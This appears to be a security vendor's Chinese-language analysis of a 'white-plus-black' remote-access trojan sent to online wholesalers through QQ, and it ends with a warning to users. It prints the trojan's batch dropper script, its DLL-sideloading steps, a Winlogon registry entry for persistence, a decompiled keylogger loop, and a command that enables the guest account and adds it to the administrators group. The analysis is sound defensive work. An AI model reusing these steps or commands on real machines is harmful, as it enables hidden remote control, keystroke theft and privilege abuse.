远控木马巧设“白加黑”陷阱：瞄准网店批发商牟取钱财

　　前言

　　近日，360安全中心监测到有不法分子通过添加QQ好友的形式，以沟通商品交易的名义发送名为“这几天团队的量”的文件，一旦接收并打开文件，电脑将被远程控制，不法分子可进一步盗取隐私及财物、甚至植入病毒实现敲诈勒索等操作。

　　360安全中心对该样本进行分析发现，“这几天团队的量.rar”是一个将木马打包在其中的压缩包文件，投递目标主要是网络批发商。牧马人通过将木马伪装成数量详情图片文件，在与商家沟通的期间，发送木马文件给商家，引诱商家中招。

　　当网店批发商在接受到文件后，解压出文件夹并点击了文件夹中的“宝贝批发数量.com”后，木马就会在后台偷偷跑起来。

　　图0：解压后文件夹内容

　　文件夹结构

　　┌─ 宝贝批发数量.com

　　│

　　├─ setup.ini

　　│

　　└─ Data

　　├─ 2018.jpg

　　│

　　├─ 360666

　　│ ├─ 360666.PNG

　　│ ├─ date

　　│ ├─ QQAPP.exe

　　│ ├─ Readme.txt

　　│ ├─ TEMA

　　│ ├─ WPS_office2016.lnk

　　│ └─ WPS_office2017.lnk

　　│

　　└─ Order

　　├─ m.exe

　　├─ WoodTorch.exe

　　└─ WPS.JPG

　　分析

　　宝贝批发数量.com

　　该文件其实为白文件，它带有艾威梯科技(北京)有限公司数字签名。

　　图1：白文件 签名信息

　　程序在执行起来后会读取同目录下的setup.ini文件，根据配置文件中Install项里的CmdLine执行命令。而文件常规打开是一堆乱码，在十六进制试图下可以清楚看到Cmdline命令。

　　图2：记事本浏览视图

　　图3：十六进制浏览视图

　　Cmdline命令如下：

　　[Install]

　　CmdLine=DataOrderWoodTorch.exe execmd DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG

　　WoodTorch.exe

　　被宝贝批发数量.com加载起来的WoodTorch.exe，实质上是命令行工具Nircmd。而上述的命令语句则是通过execmd这个执行命令指示符，在不显示任何信息至屏幕的情况下执行下面的语句：

　　DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG

　　m.exe

　　系统的cmd程序，它的作用是用于加载WPS.JPG这个批处理文件。

　　WPS.JPG

　　从文件名上来看它是一个图片，但内容为批处理脚本。内容如下：

　　图4：WPS.JPG

　　@echo off

　　cmd.exe /c start data2018.jpg

　　md c:microsoft

　　copy Data360666Readme.txt c:microsoftReadme.txt

　　copy Data360666date c:microsoftdate

　　copy Data360666360666.PNG c:microsoft360666.PNG

　　copy Data360666QQAPP.exe c:microsoftQQAPP.exe

　　copy /b Data360666TEMA+ Data360666WPS_office2016.lnk+Data360666WPS_office2017.lnk c:microsoftcommon.dll

　　start C:MicrosoftQQApp.exe

　　start c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall

　　pause

　　行为分析：

　　1. 打开Data目录下的2018.jpg图片

　　2. 创建目录 c:microsoft目录

　　3. 拷贝Data360666目录下的Readme.txt、date、360666.PNG、QQAPP.exe到c:microsoft目录中

　　4. 合并Data360666目录下的TEMA、WPS_office2016.lnk、WPS_office2017.lnk为c:microsoft目录下common.dll

　　5. 执行C:MicrosoftQQApp.exe

　　6. 执行c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall

　　步骤1的目的是为了让批发商觉得自己真的是打开了一张图片

　　图5：数量图

　　步骤2-5为白加黑木马部分

　　QQAPP.exe是带有腾讯签名的白文件，由于QQAPP.exe在调用Common.dll时，没有对Common.dll进行校验。牧马人通过将恶意文件拆分成TEMA、WPS_office2016.lnk、WPS_office2017.lnk三个文件，在程序执行过程中合并成common.dll。当QQAPP.exe执行的时候，恶意的common.dll就会被自动加载，从而执行恶意代码。

　　l 步骤6的目的是通过360666.png中的配置信息让QQAPP.exe能够在重启后自启动，达到木马驻留受害者电脑的目的。

　　[Version]

　　Signature="$Windows NT$"

　　[Defaultinstall]

　　addREG=Gc

　　[Gc]

　　HKCU,"SoftwareMicrosoftWindows NTCurrentVersionWinlogon","shell","0x00000000","Explorer.exe,C:MicrosoftQQApp.exe"

　　common.dll

　　InitBugReport ：

　　a. 通过访问www[.]baidu[.]com测试网络连通性，如果访问失败则ExitProcess。

　　图6：测试网络连通性

　　b. 导出函数为空，伪造源文件导出函数SetBugReportUin、ValidateBugReport。

　　void __cdecl TXBugReport::SetBugReportUin()

　　{

　　sub_10001F44();

　　}

　　void sub_10001F44()

　　{

　　;

　　}

　　void __cdecl TXBugReport::ValidateBugReport()

　　{

　　sub_10001F4B();

　　}

　　void sub_10001F4B()

　　{

　　;

　　}

　　c. 解密Readme.txt，解密后的Readme_dump文件为PeLoad。它负责读取解密同目录下的date文件，并创建新的线程执行解密后的date。

　　图7：创建线程

　　Readme_dump(解密后的Readme.txt)

　　a. 干扰函数

　　void Sleeps()

　　{

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　Sleep(0);

　　}

　　b. 解密date文件。

　　图8：解密算法

　　c. 读取解密同目录下的date文件，并创建新的线程执行解密后的date。

　　图9：加载木马

　　木马主体(解密后的date)

　　a. 判断C:ProgramDataMicrosoftWindowsStart MenuTorchwood.lnk文件是否存在,存在则删除文件。

　　b. 通过加密字符串T1hEVVFMWFNEVhVfVlsr解密出CC。

　　图10：解密CC地址

　　c. 网络通讯

　　图11：连接CC

　　d. 键盘记录，通过异或0x62加密后保存到C:Windowssystem32ForShare.key。

　　while ( 1 )

　　{

　　v2 = GetKeyState(16); // 获取shift键状态

　　v3 = dword_BCEAF4[v8 / 4];

　　if ( ((unsigned __int16)GetAsyncKeyState(dword_BCEAF4[v8 / 4]) >> 8) & 0x80 ) // 获取指定按键状态

　　{

　　if ( GetKeyState(20) && v2 > -1 && v3 > 64 && v3 < 93 )

　　{

　　*(&v5 + v3) = 1;

　　}

　　else

　　{

　　if ( !GetKeyState(20) )

　　goto LABEL_38;

　　if ( v2 >= 0 )

　　goto LABEL_22;

　　if ( v3 > 64 && v3 < 93 )

　　{

　　*(&v5 + v3) = 2;

　　}

　　else

　　{

　　LABEL_38:

　　if ( v2 >= 0 )

　　{

　　LABEL_22:

　　*(&v5 + v3) = 4;

　　goto LABEL_34;

　　}

　　*(&v5 + v3) = 3;

　　}

　　图12：保存键盘记录

　　e. 清除事件日志

　　图13：清除事件日志

　　f. 遍历进程，检测杀软

　　图14：杀软字符串

　　图15：遍历进程

　　g.设置guest 密码，并添加到管理员组。

　　net user guest /active:yes && net user guest 123456 && net localgroup administrators guest /add

　　h. 其余功能主要还有文件管理、注册表管理、进程管理、shell操作、下载文件、更新客户端、卸载客户端等

　　追溯

　　根据CC地址duanjiuhao.top的域名信息获取到了域名持有者的姓名、邮箱、手机号。

　　图16：whois信息

　　最后

　　年关将近，不法分子试图利用这些“白加黑”远控木马从中招用户那“谋财”。目前，360安全卫士已经对该类木马进行防御及查杀，在此也提醒网民，提防来历不明的文件、链接，同时开启安全软件，临近新年，为自己的隐私及财产安全加上一把锁。